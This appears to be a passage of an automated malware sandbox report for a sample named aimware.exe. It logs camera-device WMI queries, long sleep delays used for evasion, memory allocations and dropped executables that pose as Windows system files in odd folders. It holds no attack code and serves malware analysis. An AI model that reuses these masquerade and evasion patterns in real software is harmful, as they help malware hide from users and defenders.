Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: 1A970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Memory allocated: 16C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Memory allocated: 1B330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Memory allocated: 9F0000 memory reserve \| memory write watch
Source: C:\Recovery\spoolsv.exe	Memory allocated: 1A7D0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: CC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: 1A780000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: 14F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: 1B030000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: FE0000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: 1AB30000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: 1690000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: 1B220000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: D10000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: 1AB00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: 1060000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: 1AEF0000 memory reserve \| memory write watch
Source: C:\Recovery\spoolsv.exe	Memory allocated: 2530000 memory reserve \| memory write watch
Source: C:\Recovery\spoolsv.exe	Memory allocated: 1A7B0000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: 1350000 memory reserve \| memory write watch
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Memory allocated: 1AFD0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Memory allocated: 1A560000 memory reserve \| memory write watch
Source: C:\Recovery\spoolsv.exe	Memory allocated: 1120000 memory reserve \| memory write watch
Source: C:\Recovery\spoolsv.exe	Memory allocated: 1AF70000 memory reserve \| memory write watch

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 599684
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 599296
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 599150
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 598953
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 598578
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597875
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597558
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597421
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597281
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597155
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597046
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596796
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596656
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596545
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596436
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596202
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596038
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595921
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595803
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595685
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595440
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594968
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594671
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594541
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594437
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594210
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594093
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593938
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593827
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593718
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593609
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593499
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593366
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593250
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593137
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593030
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592908
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592781
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592661
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592526
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592248
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592065
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 591603
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 591343
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 591140
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590999
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590880
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590748
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590640
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590505
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590375
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590265
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590156
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590046
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589937
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589828
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589713
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589599
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 588690
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 588562
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 588385
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Window / User API: threadDelayed 4291
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Window / User API: threadDelayed 5347

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IqrHyRPU.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EJYQaGiX.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HIyZMmJW.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NUmFqbLL.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KbMQbIAl.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BssArfvD.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ziWzrNQC.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FRcYkGBu.log	Jump to dropped file

Source: C:\Users\user\Desktop\aimware.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23737

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe TID: 7636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\spoolsv.exe TID: 1420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\spoolsv.exe TID: 3616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 4544	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -599684s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -599296s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -599150s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -598953s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -598578s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -598234s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -597875s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -597558s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 764	Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -597421s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -597281s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -597155s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -597046s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -596906s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -596796s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -596656s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -596545s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -596436s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -596202s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -596038s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -595921s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -595803s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -595685s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -595440s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -594968s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -594671s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -594541s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 764	Thread sleep time: -300000s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -594437s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -594210s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -594093s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593938s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593827s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593718s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593609s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593499s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593366s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593250s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593137s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -593030s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -592908s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -592781s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -592661s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -592526s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -592248s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -592065s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -591603s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -591343s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -591140s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590999s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590880s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590748s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590640s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590505s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590375s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590265s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590156s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -590046s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -589937s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -589828s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -589713s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -589599s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -588690s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -588562s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7712	Thread sleep time: -588385s >= -30000s
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe TID: 5012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe TID: 5960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe TID: 7440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 7560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\spoolsv.exe TID: 7632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe TID: 7928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe TID: 8144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\spoolsv.exe TID: 3052	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
